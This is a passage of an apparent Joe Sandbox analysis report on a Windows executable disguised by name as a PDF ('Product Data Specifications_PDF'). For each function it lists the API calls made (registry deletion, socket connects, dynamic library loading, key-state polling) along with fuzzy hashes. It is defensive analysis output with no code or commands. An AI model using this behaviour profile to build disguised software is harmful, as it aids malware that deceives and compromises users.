                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Similarity
                              • API ID: MessageSend$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 1589278365-1403004172
                              • Opcode ID: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                              APIs
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                              Strings
                              Similarity
                              • API ID:
                              • String ID: SysAnimate32
                              • API String ID: 0-1011021900
                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                              • GetFocus.USER32 ref: 0046157B
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                              • __swprintf.LIBCMT ref: 00461608
                              Strings
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                              • String ID: %s%d
                              • API String ID: 2645982514-1110647743
                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                              APIs
                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: Process$CloseCountersCurrentHandleOpen
                              • String ID:
                              • API String ID: 3488606520-0
                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                              APIs
                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: AddressProc$Library$FreeLoad
                              • String ID:
                              • API String ID: 2449869053-0
                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                              APIs
                              • GetCursorPos.USER32(?), ref: 004563A6
                              • ScreenToClient.USER32(?,?), ref: 004563C3
                              • GetAsyncKeyState.USER32(?), ref: 00456400
                              • GetAsyncKeyState.USER32(?), ref: 00456410
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: AsyncState$ClientCursorLongScreenWindow
                              • String ID:
                              • API String ID: 3539004672-0
                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID:
                              • API String ID: 327565842-0
                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String
                              • String ID:
                              • API String ID: 2832842796-0
                              • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                              • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: Enum$CloseDeleteOpen
                              • String ID:
                              • API String ID: 2095303065-0
                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00436A24
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: RectWindow
                              • String ID:
                              • API String ID: 861336768-0
                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                              APIs
                              • SendMessageW.USER32 ref: 00449598
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                              • _wcslen.LIBCMT ref: 0044960D
                              • _wcslen.LIBCMT ref: 0044961A
                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: MessageSend$_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 1856069659-0
                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                              APIs
                              • GetCursorPos.USER32(?), ref: 004478E2
                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                              • GetCursorPos.USER32(00000000), ref: 0044796A
                              • TrackPopupMenuEx.USER32(01736340,00000000,00000000,?,?,00000000), ref: 00447991
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: CursorMenuPopupTrack$Proc
                              • String ID:
                              • API String ID: 1300944170-0
                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004479CC
                              • GetCursorPos.USER32(?), ref: 004479D7
                              • ScreenToClient.USER32(?,?), ref: 004479F3
                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                               Memory Dump Source: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true (associated regions and Joe Sandbox IDA Plugin snapshot file as listed above)
                              Similarity
                              • API ID: Client$CursorFromPointProcRectScreenWindow
                              • String ID:
                              • API String ID: 1822080540-0
                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 659298297-0
                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                              APIs
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                • Part of subcall function 00440D98: SendMessageW.USER32(01731B70,000000F1,00000000,00000000), ref: 00440E6E
                                • Part of subcall function 00440D98: SendMessageW.USER32(01731B70,000000F1,00000001,00000000), ref: 00440E9A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$EnableMessageSend$LongShow
                              • String ID:
                              • API String ID: 142311417-0
                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00445879
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                              • _wcslen.LIBCMT ref: 004458FB
                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                              • String ID:
                              • API String ID: 3087257052-0
                              • Opcode ID: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                              • Opcode Fuzzy Hash: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 245547762-0
                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 004471D8
                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • SelectObject.GDI32(?,00000000), ref: 00447228
                              • BeginPath.GDI32(?), ref: 0044723D
                              • SelectObject.GDI32(?,00000000), ref: 00447266
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Object$Select$BeginCreateDeletePath
                              • String ID:
                              • API String ID: 2338827641-0
                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00434598
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                              • Sleep.KERNEL32(00000000), ref: 004345D4
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
